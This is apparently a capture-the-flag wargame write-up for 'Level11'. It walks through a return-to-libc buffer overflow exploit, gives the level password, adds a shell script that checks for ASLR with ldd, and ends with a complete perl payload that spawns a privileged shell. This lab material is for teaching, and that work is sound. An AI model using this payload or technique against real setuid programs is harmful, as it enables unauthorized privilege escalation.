Level11
Use the password “what!@#$?” to access the level11 account and check the hint.
I think of it as the source code of attackme, because the content of the hint is only source code. In this attack there are both FSB and BOF vulnerabilities. I solve this problem using the BOF vulnerability. To try RTL (Return To Libc), I first check the ASLR of libc.
When I check the ASLR using the ldd command, I see that this program does not apply ASLR. Next, I use gdb to figure out the stack.
After that, I find the address of the system function and the address where “/bin/sh” is located. I create a separate file and find the address of the system function there, because I still do not have level12 permission.
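The ldd check mentioned above can be scripted by comparing library base addresses across two runs. This is an added example, not code from the original post; the function names and the sample ldd outputs are constructed for illustration.

```shell
#!/bin/sh
# Added example: compare library load addresses across two `ldd` runs.
# Identical bases on every run mean libc addresses are predictable (no ASLR).

# lib_bases: ldd output on stdin -> "library base" lines, one per mapped library.
lib_bases() {
    sed -n 's/^[[:space:]]*\([^[:space:]]*\).*(\(0x[0-9a-fA-F]*\))[[:space:]]*$/\1 \2/p'
}

# compare_runs RUN1 RUN2 -> "library fixed|randomized base1 base2" for each
# library that appears in both runs.
compare_runs() {
    { printf '%s\n' "$1" | lib_bases | sed 's/^/1 /'
      printf '%s\n' "$2" | lib_bases | sed 's/^/2 /'; } |
    awk '$1 == 1 { first[$2] = $3; next }
         ($2 in first) { print $2, (first[$2] == $3 ? "fixed" : "randomized"), first[$2], $3 }'
}

# aslr_verdict RUN1 RUN2 -> randomized | fixed | unknown (no mapped library seen)
aslr_verdict() {
    compare_runs "$1" "$2" | awk '
        $2 == "randomized" { r = 1 }
        { n++ }
        END { print (n == 0 ? "unknown" : (r ? "randomized" : "fixed")) }'
}

# Constructed sample ldd outputs (illustrative values, not taken from the page).
SAMPLE_FIXED_1='    libc.so.6 => /lib/tls/libc.so.6 (0x42000000)
    /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)'
SAMPLE_FIXED_2="$SAMPLE_FIXED_1"
SAMPLE_RAND_1='    libc.so.6 => /lib/libc.so.6 (0xb7e2a000)
    /lib/ld-linux.so.2 (0xb7fd5000)'
SAMPLE_RAND_2='    libc.so.6 => /lib/libc.so.6 (0xb7d91000)
    /lib/ld-linux.so.2 (0xb7f3c000)'

# Live use: sh aslr_check.sh /path/to/binary
if [ $# -ge 1 ]; then
    run1=$(ldd "$1"); run2=$(ldd "$1")
    compare_runs "$run1" "$run2"
    echo "verdict: $(aslr_verdict "$run1" "$run2")"
fi
```

A "fixed" verdict is the condition under which hard-coded libc addresses keep working between runs; enabling ASLR makes the verdict "randomized".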
Then, create the following code to find the address where “/bin/sh” is located:
So, I acquire all the materials to try RTL. The attack method is as follows.
The completed payload is as follows.
`perl -e 'print "A"x268,"\xc0\xf2\x03\x42","AAAA","\xa4\x73\x12\x42"'`
When I type the payload, a level12 shell is executed, and I get the password of level12.